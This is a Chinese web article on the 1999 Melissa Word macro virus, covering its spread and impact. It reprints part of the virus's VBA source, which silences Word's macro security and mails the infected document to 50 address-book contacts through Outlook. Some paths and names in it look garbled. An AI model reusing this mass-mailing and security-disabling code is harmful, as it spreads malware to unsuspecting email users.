電腦病毒梅麗莎基本介紹
世界第二電腦病毒梅麗莎,,破壞性也極強,歐美大部分國家都受到了沖擊!學(xué)習(xí)啦小編下面為大家詳細的介紹下梅麗莎病毒!
梅利莎(Melissa)
1999年3月27日,一種隱蔽性、傳播性極大的、名為Melissa(又名“美麗殺手”)的WORD97、WORD2000宏病毒出現(xiàn)在網(wǎng)上,并以幾何級數(shù)的速度在因特網(wǎng)上飛速傳播,僅在一天之內(nèi)就感染了全球數(shù)百萬臺計算機,引發(fā)了一場前所未有的“病毒風(fēng)暴”。
Melissa病毒最初是在一個成人新聞組里出現(xiàn),并為來訪用戶提供色情網(wǎng)站清單及其訪問密碼。 這個病毒專門針對微軟的電子郵件服務(wù)器和電子郵件收發(fā)軟件,它隱藏在一個WORD97格式的文件里,以附件的方式通過電子郵件傳播,善于侵襲裝有WORD97或WORD2000的計算機。它可以攻擊WORD97的注冊器并修改其預(yù)防宏病毒的安全設(shè)置,使它感染的文件所具有的宏病毒預(yù)警功能喪失作用。當(dāng)打開感染了該病毒的wORD97、WORD2000文檔時,該病毒首先感染通用模板:Nor_mal.DOT文件,并修改Windows注冊表項:HKEY_CURRENTUSER\Software\Microsoft\Office,將其增加表項: Melis_sa?,并給其賦值為:…by Kwyjibo,在OUTLOOK電子郵件程序啟動的情況下,將自動給地址簿的前50名發(fā)送信件, 該信件的主題是:“Important Message From ,該用戶名為地址簿里的已經(jīng)存放的用戶名, 信件的內(nèi)容是:Here is that document you asked for...don'show anyone else;-),并將該信件附加一個帶毒文件,名為:list.DOC,該文檔包含大量色情網(wǎng)址。
由于是熟悉的人發(fā)送的,因此容易被人們忽視。同時,該病毒還會自動重復(fù)以上的動作,由此連鎖反應(yīng),會在短時間內(nèi),造成郵件服務(wù)器的大量阻塞,直至“淹沒”電子郵件服務(wù)器,嚴(yán)重影響人們的正常網(wǎng)絡(luò)通訊。據(jù)計算,如果Mel_issa能夠按照理論上的速度傳播,只需5次就可以讓全世界所有的網(wǎng)絡(luò)用戶都收到一份。 由于病毒自動進行自我復(fù)制,因而屬于蠕蟲類病毒。Melissa的作者顯然對此頗為得意,他在病毒代碼中寫道:“蠕蟲類?宏病毒?WORD97病毒? 還是WORD2000病毒?您們自己看著辦吧!”
在發(fā)現(xiàn)Melissa病毒后短短的數(shù)小時內(nèi),該病毒即通過因特網(wǎng)在全球傳染數(shù)百萬臺計算機和數(shù)萬臺服務(wù)器, 因特網(wǎng)在許多地方癱瘓。美國YAHOO、美國在線AOL幾個大型網(wǎng)站公司,因為Melissa堵塞了他們的郵件服務(wù)系統(tǒng), 迫使他們不能收信,也不能發(fā)信,許多公司技術(shù)人員放棄了他們的周未,以應(yīng)付這個Melissa病毒所帶來的意外情況,甚至像微軟、朗訊、英特爾、Motorola這樣的技術(shù)公司及數(shù)十所大學(xué)也不例外。對此,美國聯(lián)邦調(diào)查局、美國國家設(shè)施保護中心有史以來第二次向全國發(fā)出緊急通告,我國中央電視臺也數(shù)次報道。因特網(wǎng)是沒有國界的,這種病毒也已威脅到我國網(wǎng)絡(luò)安全,現(xiàn)在國內(nèi)用戶已有感染。
Melissa最令人恐怖之處,還不在于“癱瘓”郵件服務(wù)器,而是大量涉及企業(yè)和政府的核心機密有可能通過電子郵件的反復(fù)傳遞而擴散出去,甚至受損害用戶連機密被擴散到了哪里都不知道。由此看來,Melissa較之 1988年談
之色變的“莫里斯蠕蟲病毒”,和1998年的“BO黑客程序”,更加險惡。
梅利莎病毒的源代碼:
部分源代碼
下面是梅利莎病毒的部分關(guān)鍵源代碼:
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office.0\Word\Security”,“Level”) <> “”Then
CommandBars(“Macro”).Controls(“Security...”).Enabled = False
//降低Word的安全級別,使打開含有該病毒的文件時Word不報警
System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office.0\Word\Security”, “Level”) = 1&
Else
CommandBars(“Tools”).Controls(“Macro”).Enabled = False
//使Word的宏菜單上沒有編輯宏的可能
……
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
//搜索要感染對象的E-Mail地址,并形成感染郵件,目前這一技術(shù)被網(wǎng)絡(luò)蠕蟲廣泛利用。
Set UngaDasOutlook = CreateObject(“Outlook.Application”)
Set DasMapiName = UngaDasOutlook.GetNameSpace(“MAPI”)
If System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office\”, “Melissa?”) <> “... by Kwyjibo” Then
If UngaDasOutlook = “Outlook” Then
DasMapiName.Logon “profile”, “password”
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook=DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice=UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count //發(fā)送50個信件
Next oo
BreakUmOffASlice.Subject = “Important Message From ”& Application.UserName // 感染病毒的信件主題
BreakUmOffASlice.Body = “Here is that document you asked for ... don’t show anyone else ;-)”
//信件的主體
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName //病毒信件的附件
BreakUmOffASlice.Send // 發(fā)送
Peep =“”
Next y
DasMapiName.Logoff
End If
System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office\”,“Melissa?”) = “... by Kwyjibo”
End If
//以下代碼感染W(wǎng)ord的模板文件或通過染毒的模板文件感染新的Word文檔
看了此文電腦病毒梅麗莎基本介紹的人還看了:
3.電腦病毒蟲介紹
4.大電腦病毒有哪些